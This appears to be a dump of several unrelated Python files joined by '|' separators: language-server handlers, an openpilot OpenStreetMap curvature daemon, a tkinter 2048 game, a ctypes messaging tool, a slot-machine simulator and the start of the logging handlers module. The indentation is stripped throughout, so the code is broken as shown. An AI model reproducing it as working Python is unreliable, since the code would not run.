def m_text_document__did_open(self, textDocument=None, **_kwargs):
self.workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'])
def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
for change in contentChanges:
self.workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'])
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'])
def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
return self.completions(textDocument['uri'], position)
def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position, exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for doc_uri in self.workspace.documents:
self.lint(doc_uri)
def m_workspace__did_change_watched_files(self, **_kwargs):
# Externally changed files may result in changed diagnostics
for doc_uri in self.workspace.documents:
self.lint(doc_uri)
def m_workspace__execute_command(self, command=None, arguments=None):
return self.execute_command(command, arguments)
def flatten(list_of_lists):
return [item for lst in list_of_lists for item in lst]
def merge(list_of_dicts):
return {k: v for dictionary in list_of_dicts for k, v in dictionary.items()}
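# Illustrative behavior of the helpers above (hedged):
#   flatten([[1, 2], [3]]) == [1, 2, 3]
#   merge([{'a': 1}, {'b': 2}]) == {'a': 1, 'b': 2}
# Note that merge lets later dicts override earlier keys.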
|
mapd.py
|
#!/usr/bin/env python
# this program reads the current gps location, finds the road in openmaps and calculates the curves ahead
# it will publish the liveMapData message
# see https://towardsdatascience.com/loading-data-from-openstreetmap-with-python-and-the-overpass-api-513882a27fd0
# see https://wiki.openstreetmap.org/wiki/Template:Highways
# TODO : extend message with fields for road details (name, highway type, lanes)
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
try:
from scipy import spatial
except ImportError as e:
import os
import sys
from common.basedir import BASEDIR
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
try:
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
except KeyError:
os.environ['LD_LIBRARY_PATH'] = openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
if __name__ == "__main__":
sys.path.append("/home/pi/openpilot")
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from selfdrive.services import service_list
import selfdrive.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
# Kumi offers an API for openmaps
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
Source: https://stackoverflow.com/a/31622038
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def build_way_query(lat, lon, radius=50):
# Builds a query to find all highways within a given radius around a point
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;
"""
return q
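# For example, build_way_query(52.52, 13.405, radius=3000) renders roughly as
# (whitespace aside; coordinates are illustrative):
#   (way (around:3000.000000,52.520000,13.405000)
#    [highway][highway!~"^(footway|path|...)$"];
#    >;);out;
# i.e. all drivable ways within 3 km of the point, with ">" also returning
# the nodes that make up those ways.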
def query_thread():
global last_query_result, last_query_pos, cache_valid
# overpy.Overpass is an API to access openmaps data using nodes, ways and relations
# all within a search box (e.g. 4 points or a circle)
# the timeout and headers params used in OP are not valid
# api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
api = overpy.Overpass(url=OVERPASS_API_URL)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
print (last_gps.latitude, last_gps.longitude)
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 1000:
continue
if dist > 3000:
cache_valid = False
# print (last_gps.latitude, last_gps.longitude)
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=3000)
try:
new_result = api.query(q)
# print (q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
# print ("nodes")
# print (n.lat, n.lon)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
# print ("ways")
# print (n.lat, n.lon)
# if no nodes are found, geodetic2ecef will raise an error
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)
query_lock.acquire()
last_query_result = None
query_lock.release()
def mapsd_thread():
# get gps location from zmq using gps or gps_external (lat, long, bearing, speed)
# calculate the curve of the road ahead, find max_speed
# and send all results to zmq
global last_gps
context = zmq.Context()
gps_sock = messaging.sub_sock(context, service_list['gpsLocation'].port, conflate=True)
gps_external_sock = messaging.sub_sock(context, service_list['gpsLocationExternal'].port, conflate=True)
map_data_sock = messaging.pub_sock(context, service_list['liveMapData'].port)
print ("Waiting for internal or external GPS in mapsd thread")
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
lat = 0
lon = 0
while True:
# wait for at least 1 GPS signal
gps_found = False
while not gps_found:
gps = messaging.recv_one_or_none(gps_sock)
gps_ext = messaging.recv_one_or_none(gps_external_sock)
if gps_ext is not None or gps is not None:
gps_found = True
else:
time.sleep(1)
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
print ("External GPS found")
else:
gps = gps.gpsLocation
print ("GPS found")
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
roadName = ""
lanes = 0
surface = ""
highway = ""
# print ("none")
else:
# print ("valid")
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
print (lat, lon, heading, speed)
# find the closest road to the gps data = current way
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
# get all the details of the road
print ("cur_way=" + str(cur_way))
roadName, lanes, surface, highway = cur_way.road_details
# print ("Road details" + str(cur_way.road_details))
pnts, curvature_valid = cur_way.get_lookahead(last_query_result, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
# map function in python3 no longer returns a list
#road_points = map(float, xs), map(float, ys)
road_points = list(map(float, xs)), list(map(float, ys))
# minimum speed adjusted so we can use it in slower vehicles
if speed < 4:
#if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
# now send the liveMapData message
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
# print ("lastgps")
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# print ("curway")
# Speed limit
max_speed = cur_way.max_speed
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
# print ("speedlimit=" + str(max_speed))
# Road details
dat.liveMapData.roadName = roadName
dat.liveMapData.lanes = lanes
dat.liveMapData.surface = surface
dat.liveMapData.highway = highway
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
# the python3 map function doesn't return a list
# dat.liveMapData.roadCurvatureX = map(float, dists)
# dat.liveMapData.roadCurvature = map(float, curvature)
dat.liveMapData.roadCurvatureX = list(map(float, dists))
dat.liveMapData.roadCurvature = list(map(float, curvature))
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
setup_thread_excepthook()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
print ("Thread started")
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
puzzle.py
|
from tkinter import *
from logic import *
from random import *
import threading
from copy import deepcopy
from time import sleep
from tkinter.messagebox import showerror, showinfo
import os
SIZE = 500
GRID_LEN = 4
GRID_PADDING = 10
BACKGROUND_COLOR_GAME = "#92877d"
BACKGROUND_COLOR_CELL_EMPTY = "#9e948a"
BACKGROUND_COLOR_DICT = {2: "#eee4da", 4: "#ede0c8", 8: "#f2b179", 16: "#f59563", \
32: "#f67c5f", 64: "#f65e3b", 128: "#edcf72", 256: "#edcc61", \
512: "#edc850", 1024: "#edc53f", 2048: "#edc22e"}
CELL_COLOR_DICT = {2: "#776e65", 4: "#776e65", 8: "#f9f6f2", 16: "#f9f6f2", \
32: "#f9f6f2", 64: "#f9f6f2", 128: "#f9f6f2", 256: "#f9f6f2", \
512: "#f9f6f2", 1024: "#f9f6f2", 2048: "#f9f6f2"}
FONT = ("Verdana", 40, "bold")
KEY_UP_ALT = "\'\\uf700\'"
KEY_DOWN_ALT = "\'\\uf701\'"
KEY_LEFT_ALT = "\'\\uf702\'"
KEY_RIGHT_ALT = "\'\\uf703\'"
KEY_UP = "'w'"
KEY_DOWN = "'s'"
KEY_LEFT = "'a'"
KEY_RIGHT = "'d'"
def show_error(e):
showerror("注意", "请检查next_step函数后继续\n报错信息:\n" + str(e))
os._exit(1)
class GameGrid(Frame):
def __init__(self):
Frame.__init__(self)
self.auto = False
try:
from main import next_step
self.next_step = next_step
self.auto = True
except (ModuleNotFoundError, ImportError):
showinfo('Notice', 'No next_step function found; entering manual mode\nUse W, A, S, D to control')
except Exception as e:
show_error(e)
self.grid()
self.matrix = None
self.master.title('2048')
# self.gamelogic = gamelogic
self.commands = {KEY_UP: up, KEY_DOWN: down, KEY_LEFT: left, KEY_RIGHT: right,
KEY_UP_ALT: up, KEY_DOWN_ALT: down, KEY_LEFT_ALT: left, KEY_RIGHT_ALT: right}
self.commands_auto = {'up': up, 'down': down, 'left': left, 'right': right}
self.grid_cells = []
self.init_grid()
self.init_matrix()
self.update_grid_cells()
if not self.auto:
self.master.bind("<Key>", self.key_down)
else:
self.pause_flag = True
self.pause_button = Button(self, text='Start', command=self.pause)
self.pause_button.pack(side=LEFT)
Button(self, text='Step', command=self.one_step).pack(side=LEFT)
self.scale = Scale(self, from_=1, to=100, orient=HORIZONTAL)
self.scale.pack(fill=X)
self.scale.set(1)
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
self.mainloop()
def init_grid(self):
background = Frame(self, bg=BACKGROUND_COLOR_GAME, width=SIZE, height=SIZE)
background.pack()
for i in range(GRID_LEN):
grid_row = []
for j in range(GRID_LEN):
cell = Frame(background, bg=BACKGROUND_COLOR_CELL_EMPTY, width=SIZE / GRID_LEN, height=SIZE / GRID_LEN)
cell.grid(row=i, column=j, padx=GRID_PADDING, pady=GRID_PADDING)
# font = Font(size=FONT_SIZE, family=FONT_FAMILY, weight=FONT_WEIGHT)
t = Label(master=cell, text="", bg=BACKGROUND_COLOR_CELL_EMPTY, justify=CENTER, font=FONT, width=4,
height=2)
t.grid()
grid_row.append(t)
self.grid_cells.append(grid_row)
def gen(self):
return randint(0, GRID_LEN - 1)
def init_matrix(self):
self.matrix = new_game(4)
self.matrix = add_two(self.matrix)
self.matrix = add_two(self.matrix)
def update_grid_cells(self):
for i in range(GRID_LEN):
for j in range(GRID_LEN):
new_number = self.matrix[i][j]
if new_number == 0:
self.grid_cells[i][j].configure(text="", bg=BACKGROUND_COLOR_CELL_EMPTY)
else:
self.grid_cells[i][j].configure(text=str(new_number), bg=BACKGROUND_COLOR_DICT[new_number],
fg=CELL_COLOR_DICT[new_number])
self.update_idletasks()
def key_down(self, event):
key = repr(event.char)
if key in self.commands:
self.matrix, done = self.commands[repr(event.char)](self.matrix)
if done:
self.matrix = add_two(self.matrix)
self.update_grid_cells()
done = False
if game_state(self.matrix) == 'win':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Win!", bg=BACKGROUND_COLOR_CELL_EMPTY)
if game_state(self.matrix) == 'lose':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Lose!", bg=BACKGROUND_COLOR_CELL_EMPTY)
def generate_next(self):
index = (self.gen(), self.gen())
while self.matrix[index[0]][index[1]] != 0:
index = (self.gen(), self.gen())
self.matrix[index[0]][index[1]] = 2
def run(self):
while not self.pause_flag:
self.one_step()
if not self.scale.get() > 95:
sleep(1 / self.scale.get())
def pause(self):
if self.pause_button['text'] == 'Pause':
self.pause_button['text'] = 'Resume'
self.pause_flag = True
elif self.pause_button['text'] == 'Restart':
del self.matrix
self.init_matrix()
self.update_grid_cells()
self.pause_button['text'] = 'Start'
self.pause_flag = True
else:
self.pause_button['text'] = 'Pause'
self.pause_flag = False
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def one_step(self):
key = None
try:
key = self.next_step(deepcopy(self.matrix))
if key not in self.commands_auto:
show_error('Please check the function return value!')
except Exception as e:
show_error(e)
if key in self.commands_auto:
self.matrix, done = self.commands_auto[key](self.matrix)
if done:
self.matrix = add_two(self.matrix)
self.update_grid_cells()
done = False
if game_state(self.matrix) == 'win':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Win!", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.pause_button['text'] = 'Restart'
if game_state(self.matrix) == 'lose':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Lose!", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.pause_button['text'] = 'Restart'
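# A hedged sketch of the next_step contract GameGrid tries to import from
# main.py (hypothetical example, not wired in): given a copy of the board
# matrix, return one of 'up' / 'down' / 'left' / 'right'.
def _example_next_step(matrix):
    for move, fn in (('left', left), ('down', down),
                     ('right', right), ('up', up)):
        _, done = fn(deepcopy(matrix))
        if done:  # the move changes the board, so it is legal
            return move
    return 'up'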
gamegrid = GameGrid()
# for i in range(10000000):
# print('asd')
|
halperf-alt.py
|
#!/usr/bin/python3
import argparse
import time
from ctypes import *
from threading import Thread, Timer
# Open C shared libs to the datatypes; TODO: make spec-driven
xdc_so = None
gma_so = None
DATA_TYP_POS = 1
DATA_TYP_DIS = 2
class GapsTag(Structure):
_fields_ = [("mux", c_uint),
("sec", c_uint),
("typ", c_uint)]
class ClosureTrailer(Structure):
_fields_ = [('seq', c_uint),
('rqr', c_uint),
('old', c_uint),
('mid', c_ushort),
('crc', c_ushort)]
class Position(Structure):
_fields_ = [("x", c_double),
("y", c_double),
("z", c_double),
("t", ClosureTrailer)]
class Distance(Structure):
_fields_ = [("x", c_double),
("y", c_double),
("z", c_double),
("t", ClosureTrailer)]
class RptTimer(Timer):
def run(self):
while not self.finished.is_set():
self.finished.wait(self.interval)
self.function(*self.args, **self.kwargs)
self.finished.set()
def send(m, s, t, r, c):
# Context/Socket setup
makesock = xdc_so.xdc_pub_socket
makesock.restype = c_void_p
sock = makesock()
#initial values
pos = Position(-74.574489, 40.695545, 101.9, ClosureTrailer(0,0,0,0,0))
dis = Distance(-1.021, 2.334, 0.4)
tag = GapsTag(int(m),int(s),int(t))
if int(t) == 1:
adu = Position(pos.x, pos.y, pos.z, ClosureTrailer(0,0,0,0,0))
elif int(t) == 2:
adu = Distance(dis.x, dis.y, dis.z, ClosureTrailer(0,0,0,0,0))
else:
raise Exception('unsupported data typ: ' + str(t))
def task():
adu.z += 0.1
xdc_so.xdc_asyn_send(c_void_p(sock), pointer(adu), tag)
print("%f sent: [%d/%d/%d] -- (%f,%f,%f)" % (time.time(), tag.mux, tag.sec, tag.typ, adu.x, adu.y, adu.z))
# keep a reference to the timer itself; .start() returns None
rtmr = RptTimer(1.0 / float(r), task)
rtmr.start()
def recv(m, s, t):
if int(t) == DATA_TYP_POS:
adu = Position()
elif int(t) == DATA_TYP_DIS:
adu = Distance()
else:
raise Exception('data type %d not supported' % (int(t)))
print("Subscribed to [%s/%s/%s]" % (m,s,t))
tag = GapsTag(int(m), int(s), int(t))
makesock = xdc_so.xdc_sub_socket
makesock.restype = c_void_p
sock = makesock(tag)
while(1):
xdc_so.xdc_blocking_recv(c_void_p(sock), pointer(adu), pointer(tag))
print('%f recv: [%d/%d/%d] -- (%f,%f,%f)' % (time.time(), tag.mux,tag.sec,tag.typ,adu.x,adu.y,adu.z))
def busy_sleep(s):
start = time.time()
while (time.time() < start + s):
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--send', nargs=4, action='append', metavar=('MUX', 'SEC', 'TYP', 'RATE'), help='send cross-domain flow using MUX/SEC/TYP at RATE (Hz)')
parser.add_argument('-r', '--recv', nargs=3, action='append', metavar=('MUX', 'SEC', 'TYP'), help='recv cross-domain flow mapped to MUX/SEC/TYP')
parser.add_argument('-c', metavar=('COUNT'), help="packets to send (default=no limit)", type=int, default=-1)
parser.add_argument('-l', metavar=('PATH'), help="path to mission app shared libraries (default=../appgen)", default='../appgen')
parser.add_argument('-x', metavar=('PATH'), help="path to libxdcomms.so (default=../api)", default='../api')
parser.add_argument('-i', metavar=('URI'), help="in URI (default=ipc:///tmp/halpub1)", default='ipc:///tmp/halpub1')
parser.add_argument('-o', metavar=('URI'), help="out URI (default=ipc:///tmp/halsub1)", default='ipc:///tmp/halsub1')
args = parser.parse_args()
xdc_so = CDLL(args.x + '/libxdcomms.so', use_errno=True)
gma_so = CDLL(args.l + '/libgma.so')
# Set the URIs for ZMQ
xdc_so.xdc_ctx()
xdc_so.xdc_set_in(c_char_p((args.i).encode('utf-8')))
xdc_so.xdc_set_out(c_char_p((args.o).encode('utf-8')))
# Register encode/decode functions; TODO: make spec-driven
xdc_so.xdc_register(gma_so.position_data_encode, gma_so.position_data_decode, DATA_TYP_POS)
xdc_so.xdc_register(gma_so.distance_data_encode, gma_so.distance_data_decode, DATA_TYP_DIS)
if args.send:
for s in args.send:
s.append(args.c)
t = Thread(args=s, target=send)
t.start()
if args.recv:
for r in args.recv:
t = Thread(args=r, target=recv)
t.start()
|
code_execution_with_time_limit.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import threading
def run():
import time
i = 1
# Infinite loop
while True:
print(i)
i += 1
time.sleep(1)
if __name__ == '__main__':
thread = threading.Thread(target=run, daemon=True)
thread.start()
# Wait
thread.join(5)
print('Quit!')
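# Note: thread.join(5) only waits up to five seconds; the daemon thread keeps
# running until the interpreter exits, at which point it is killed abruptly.
# A hedged sketch of a variant that really terminates the work after the
# timeout would use a process instead (illustrative only):
#
#   from multiprocessing import Process
#   p = Process(target=run)
#   p.start()
#   p.join(5)
#   p.terminate()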
|
game.py
|
import threading
from numpy import inf as Inf  # numpy.core.numeric is a private module path
from wheel import reel
import random
from typing import List
import time
import os
import numpy as np
__price = 0
__game_count = 0
__num_of_line = Inf
def reset():
global __game_count,__price
__price = 0
__game_count = 0
def start_spinning(threads:List[threading.Thread],reels:List[reel],mode = 0):
global __game_count
if check_game_status(threads) == 0 or check_game_status(threads) == 2:
threads.clear()
__game_count += 1
for i in range(len(reels)):
reels[i].stop = False
threads.append(threading.Thread(target=reels[i].spin, args = (random.randint(25,60),mode,)))
threads[i].daemon = True
threads[i].start()
def stop_wheel(threads:List[threading.Thread],reels:List[reel],all = False):
if check_game_status(threads) == 1:
for i in range(len(reels)):
if threads[i].is_alive():
reels[i].stop = True
print("STOP")
if all == False:
break
def check_game_status(threads:List[threading.Thread]):
if len(threads) == 0:
return 0
for i in threads:
if i.is_alive():
return 1
return 2
# 0 -> first game
# 1 -> running
# 2 -> finish
def check_results(reels:List[reel]):
matrix = []
for i in range(len(reels)):
matrix.append(reels[i].reel)
matrix = np.array(matrix)
diag = []
diag2 = []
line = []
for i in range(len(matrix)):
diag.append(matrix[i][i])
diag2.append(matrix[i][(len(matrix)-i-1)])
# line 1 - n
for i in range(len(reels)):
for n in range(3,len(matrix[:,i])+1):
for j in range(len(matrix[:,i])-n+1):
if (matrix[:,i][j:j+n] == matrix[:,i][j]).all():
line.append([i+1,matrix[:,i][j]])
# diagonal lines
for n in range(3,len(matrix[:,i])+1):
for j in range(len(matrix[:,i])-n+1):
if (diag[j:j+n] == diag[j]).all():
line.append([len(reels)+1,diag[j]])
for n in range(3,len(matrix[:,i])+1):
for j in range(len(matrix[:,i])-n+1):
if (diag2[j:j+n] == diag2[j]).all():
line.append([len(reels)+2,diag2[j]])
line = np.array(line)
return line
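# Illustrative reading of the result (hedged): each row of the returned array
# is [payline_number, symbol]. Paylines 1..len(reels) are the columns of the
# stacked reel matrix; payline len(reels)+1 is the main diagonal and
# len(reels)+2 the anti-diagonal. Every sub-run of three or more equal
# symbols is recorded, so a long run yields several entries.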
def update_price(amount):
global __price
__price += amount
return __price
def update_play_lines(num):
global __num_of_line
__num_of_line = num
def gui_interface(reels:List[reel],results,threads:List[threading.Thread],fx):
global __game_count,__price
current_game = 0
counter = 0
start_time = time.time()
elapsed = 0
while len(reels) > 0:
try:
if elapsed != 0:
if counter/elapsed < 25:
os.system('cls')
print("FPS: "+str(int(counter/elapsed)))
if __num_of_line > len(reels)+2:
print("Payout Lines: "+str(len(reels)+2))
else:
print("Payout Lines: "+str(__num_of_line))
print("Game: "+str(__game_count))
print("Total Payouts: "+str(__price))
print("_________THE BIG GAME MACHINE_________")
print()
for i in range(len(reels)):
# print(i+1,end='')
if 19 - int((len(reels)*5)/2)> 0:
for k in range(19 - int((len(reels)*5)/2)):
print(' ',end='')
for j in range(len(reels)):
print(" |",end='')
for m in range(len(str(max(reels[j].reel)))-len(str(reels[j].reel[i]))):
print('0',end='')
print(str(reels[j].reel[i])+"| ",end='')#str()
print()
if check_game_status(threads) == 2:
if current_game != __game_count:
current_price = 0
results = check_results(reels)
for i in range(len(results)):
if results[i][0] <= __num_of_line:
current_price += fx(results[i][1])
__price += current_price
current_game += 1
if len(results) > 0:
print(results)
print(current_price)
else:
print("Nothing!")
counter += 1
elapsed = time.time() - start_time
if elapsed >= 1:
start_time = time.time()
elapsed = 0
counter = 0
except Exception as e:
print(e)
# input()
def simulation(number_of_runs,reels:List[reel],results,threads:List[threading.Thread],fx):
global __game_count,__price
price_list = []
while __game_count < number_of_runs:
__game_count += 1
cp = 0
for i in range(len(reels)):
reels[i].spin(random.randint(25,60),mode=1)
results = check_results(reels)
for i in range(len(results)):
if results[i][0] <= __num_of_line:
cp += fx(results[i][1])
price_list.append(cp)
__price += cp
# if cp > 4:
# for i in range(len(reels)):
# for j in range(len(reels)):
# print(" |"+str(reels[j].reel[i])+"| ",end='')#str()
# print()
# input()
print('game: ' + str(__game_count) + ' current_price: ' + str(cp))
# print('total price: '+str(__price))
import matplotlib.pyplot as plt
# plt.figure()
# price_list = np.array(price_list)
# y,x = np.histogram(price_list,bins = [0,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,190,200])
# y = y.tolist()
# for i in range(len(y)):
# y[i] = y[i]/number_of_runs
# print(y)
# print(x)
# print(max(price_list))
# # plt.bar(price_list,bins = 8)
# plt.bar(x[0:-1],y,width=10)
# plt.plot(x[0:-1],y,color = 'orange')
return __price
|
handlers.py
|
# Copyright 2001-2015 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2015 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError: #pragma: no cover
threading = None
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
